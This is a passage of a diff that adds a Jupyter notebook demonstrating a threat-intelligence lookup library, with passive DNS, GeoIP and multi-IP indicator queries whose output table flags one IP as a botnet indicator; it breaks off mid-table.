+     "end_time": "2019-09-25T04:58:04.168465Z",
+     "start_time": "2019-09-25T04:58:03.567435Z"
+    },
+    "tags": []
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "(True, [('XForce', LookupResult(ioc='38.75.137.9', ioc_type='ipv4', safe_ioc='38.75.137.9', query_subtype='passivedns', provider='XForce', result=True, severity='information', details={'records': 1}, raw_result={'Passive': {'query': '0x00000000000000000000ffff264b8909', 'records': []}, 'RDNS': ['9-137-75-38.clients.gthost.com'], 'total_rows': 1}, reference='https://api.xforce.ibmcloud.com/resolve/38.75.137.9', status=0))])\n",
+      "\n",
+      "Provider result:\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": "{'Passive': {'query': '0x00000000000000000000ffff264b8909', 'records': []},\n 'RDNS': ['9-137-75-38.clients.gthost.com'],\n 'total_rows': 1}"
+     },
+     "execution_count": 15,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "result = ti_lookup.lookup_ioc(observable=\"38.75.137.9\", ico_type=\"ipv4\", ioc_query_type=\"passivedns\", providers=[\"XForce\"])\n",
+    "print(result)\n",
+    "print(\"\\nProvider result:\")\n",
+    "result[1][0][1].raw_result"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Use to do a GeoIP lookup"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:04.287394Z",
+     "start_time": "2019-09-25T04:58:04.169440Z"
+    },
+    "tags": []
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "(True, [('OTX', LookupResult(ioc='38.75.137.9', ioc_type='ipv4', safe_ioc='38.75.137.9', query_subtype='geo', provider='OTX', result=True, severity='information', details={}, raw_result={'asn': 'AS63023 AS-GLOBALTELEHOST', 'city_data': True, 'city': 'Los Angeles', 'region': 'CA', 'continent_code': 'NA', 'country_code3': 'USA', 'country_code2': 'US', 'subdivision': 'CA', 'latitude': 34.0544, 'postal_code': '90009', 'longitude': -118.244, 'accuracy_radius': 1000, 'country_code': 'US', 'country_name': 'United States of America', 'dma_code': 803, 'charset': 0, 'area_code': 0, 'flag_url': '/assets/images/flags/us.png', 'flag_title': 'United States of America'}, reference='https://otx.alienvault.com/api/v1/indicators/IPv4/38.75.137.9/geo', status=0))])\n",
+      "\n",
+      "Provider result:\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": "{'asn': 'AS63023 AS-GLOBALTELEHOST',\n 'city_data': True,\n 'city': 'Los Angeles',\n 'region': 'CA',\n 'continent_code': 'NA',\n 'country_code3': 'USA',\n 'country_code2': 'US',\n 'subdivision': 'CA',\n 'latitude': 34.0544,\n 'postal_code': '90009',\n 'longitude': -118.244,\n 'accuracy_radius': 1000,\n 'country_code': 'US',\n 'country_name': 'United States of America',\n 'dma_code': 803,\n 'charset': 0,\n 'area_code': 0,\n 'flag_url': '/assets/images/flags/us.png',\n 'flag_title': 'United States of America'}"
+     },
+     "execution_count": 16,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "result = ti_lookup.lookup_ioc(observable=\"38.75.137.9\", ico_type=\"ipv4\", ioc_query_type=\"geo\", providers=[\"OTX\"])\n",
+    "print(result)\n",
+    "print(\"\\nProvider result:\")\n",
+    "result[1][0][1].raw_result"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Inferring IoC Type vs. Specifying explicity\n",
+    "If you do a lookup without specifying a type, TILookup will try to infer the type by matching regexes. There are patterns for all supported types but there are some caveats:\n",
+    "\n",
+    "- The match is not 100% foolproof - e.g. some URLs and hash types may be misidentified.\n",
+    "- The inference adds an overhead to each lookup.\n",
+    "\n",
+    "If you know the type that you want to look up, it is always better to explicitly include it.\n",
+    "- For single IoC lookup, use the `ioc_type` parameter.\n",
+    "- For multiple IoC lookups (see below), supply either:\n",
+    "  - a DataFrame with a column that specifies the type for each entry\n",
+    "  - a dictionary of the form `{ioc_observable: ioc_type}`"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Looking up Multiple IoCs"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### lookup_iocs\n",
+    "```\n",
+    "Signature:\n",
+    "ti_lookup.lookup_iocs(\n",
+    "    data: Union[pandas.core.frame.DataFrame, Mapping[str, str], Iterable[str]],\n",
+    "    obs_col: str = None,\n",
+    "    ioc_type_col: str = None,\n",
+    "    ioc_query_type: str = None,\n",
+    "    providers: List[str] = None,\n",
+    "    prov_scope: str = 'primary',\n",
+    "    **kwargs,\n",
+    ") -> pandas.core.frame.DataFrame\n",
+    "\n",
+    "Lookup a collection of IoCs.\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "data : Union[pd.DataFrame, Mapping[str, str], Iterable[str]]\n",
+    "    Data input in one of three formats:\n",
+    "    1. Pandas dataframe (you must supply the column name in\n",
+    "    `obs_col` parameter)\n",
+    "    2. Mapping (e.g. a dict) of [observable, IoCType]\n",
+    "    3. Iterable of observables - IoCTypes will be inferred\n",
+    "obs_col : str, optional\n",
+    "    DataFrame column to use for observables, by default None\n",
+    "ioc_type_col : str, optional\n",
+    "    DataFrame column to use for IoCTypes, by default None\n",
+    "ioc_query_type: str, optional\n",
+    "    The ioc query type (e.g. rep, info, malware)\n",
+    "providers: List[str]\n",
+    "    Explicit list of providers to use\n",
+    "prov_scope : str, optional\n",
+    "    Use primary, secondary or all providers, by default \"primary\"\n",
+    "kwargs :\n",
+    "    Additional arguments passed to the underlying provider(s)\n",
+    "\n",
+    "Returns\n",
+    "-------\n",
+    "pd.DataFrame\n",
+    "    DataFrame of results\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:04.290371Z",
+     "start_time": "2019-09-25T04:58:04.288371Z"
+    }
+   },
+   "outputs": [],
+   "source": [
+    "# Uncomment this and run to see the document string\n",
+    "# ti_lookup.lookup_iocs?"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-19T01:36:31.215275Z",
+     "start_time": "2019-09-19T01:36:31.200284Z"
+    }
+   },
+   "source": [
+    "### Multiple IP Lookup from single provider"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 27,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:07.304839Z",
+     "start_time": "2019-09-25T04:58:04.293368Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>Ioc</th>\n      <th>IocType</th>\n      <th>QuerySubtype</th>\n      <th>Reference</th>\n      <th>Result</th>\n      <th>Status</th>\n      <th>Severity</th>\n      <th>Details</th>\n      <th>RawResult</th>\n      <th>Provider</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>0</th>\n      <td>1.2.3.4</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>False</td>\n      <td>0.0</td>\n      <td>0.0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>51.75.29.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>False</td>\n      <td>0.0</td>\n      <td>0.0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>1.2.3.5</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>False</td>\n      <td>0.0</td>\n      <td>0.0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '2E9C9B5884CE9D1AAECA21C5EB772C30C3C84093C452AA038868AD4EEF50E83E', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'AA38B8D61F8587B779AABF6C4F2DBD226C7704600A5CBBB7779A7D0E7AFA05C4', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>5</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'E9DD356FF6855D16952067E4A35F0AAA1A8FF4E955E20B249131BD0EF7115A1E', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>6</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '0612D0A787F9B2EA5FC1206C3727B3ADAD45D8AEDE2D90ADEC1C3B1590A609E0', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>7</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '4DDD4BC9AD3844756B4DF7FAB23E9E9B917124D0A257BB405EF5715DEAA3D61B', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>8</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'CAFF80F6C8FD64CDA73AE68E382C6A7B6C94CA257C897324E6DB78D8C2106588', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>9</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'C72FAFC4A20054F73B343418F5EBE887610D257FFD51439392CC0376AB3B7173', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>10</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '6E2A2B758395B8894E3B0D189870E155E0894D3801B951AE438D5C4A808F48E4', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>11</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '30196A288FA811E8ACCCC84C434E3AD15F175B17BE2D4458DD3BC660073C1365', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>12</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'E75DD2AC6D75085D6CC7F441B2AFB121D77422CA708C04923CEB74C0A6245DBA', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>13</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'E91D764D861739FAEF7B106ED830D247262CDA4F2A8B312F1172E74D10CFD995', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>14</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '0D2CC834B27D0EB8A4485B6B21295606F38B8DF06C0B2858D511157EE86AF219', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>15</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'D46F322358CB5FE7009A492564DD60C67E529A8439EA2B5F355385B9724F991C', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>16</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '9570FF685A0289C703861F52B094C25A8D774570433A6562C85229A48DC826D3', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>17</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '017D81A341E38E8355DA9EB6AAEE8AADC411ECE067DA84B586F59AC8EB3EDFAE', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>18</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'C771855E8F619F1852441349C314334193E7F45A8B4A9E5A20B0FAB9DD4DF783', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>19</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'C8133547D243769B2C38D4C2D03E90A14A340C7538BDAA21FE95BB2C906F350A', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>20</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '3DFA877928D3B3E4D43696BF27ACA7098523C7429E43FD439368A4535FEB1E8E', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>21</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '57DA6DAC917CF91DCF7ADEFFBC8AE94EE839C09FFD4103742D54E05A4E608FFB', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>22</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '681C2296F85244215361CCFB1F0863DA7BF92C42BD091E29B4BFAFFD8BE46B12', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>23</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '066D608C45B2A7CD63AD0F3286B56917E410546F6DF9A1E3A7018DCE33F29F66', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>24</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'AF0236BB54DB7C849FEF2D6A6E63143481214566E7666B1FF8D68B099C88DB37', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>25</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'AA67F6A7A899FAF845E959052C30C712DC96089309CF3F41CE24368E1B4E9F3D', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>26</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'FE9F08ED47A7E93E33C91A86D9B835E6A87DDE85660E19FCE35C254DDE95C641', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>27</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'AF4653DB24E9C45A116A6CD2B25D103D55A76457CEE9597205A3B3F4438F4CA1', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>28</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '77C853D9EB8905812EEE44FCF5A7769F5E1F1CAC4CAE769FE7A33EBE5CC6EFB4', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>29</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'AE3584C5872970B9B16536D5F4A39B247D52F183A34B8D0D3A501FDE1D604057', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>30</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '2B3D1B719533D10EF42E0BA1948BDE099A83C38BAF53E8369CB9651A890A0CD2', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>31</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '3DE92C875100CC6465533A6767AEB58A202D7C347792D72F9D3B62BA93B17BD2', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>32</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '7013C9E4A99F8869AF650FC36ACE5380C9037C3599C001B8906120A54CB6A6D2', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>33</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '22E5A059B774EA99993C1C66A83F4001F8A238EF805D992782F6E84A4EA07066', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>34</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '8A5D40A2674F98084398B2BFD97E33B39665F9B5FE98A485C1C149F363442679', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>35</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '6A131B8B9E162BB546FBC24F0563A66A0DE69105B6614E881927BB537817345B', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>36</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '7C5DAF47611B1F133E76B16145E46F30F269348A9C34C51AA7FFDC5FA8A7D231', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>37</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:24:18.972814Z) | w...</td>\n      <td>True</td>\n      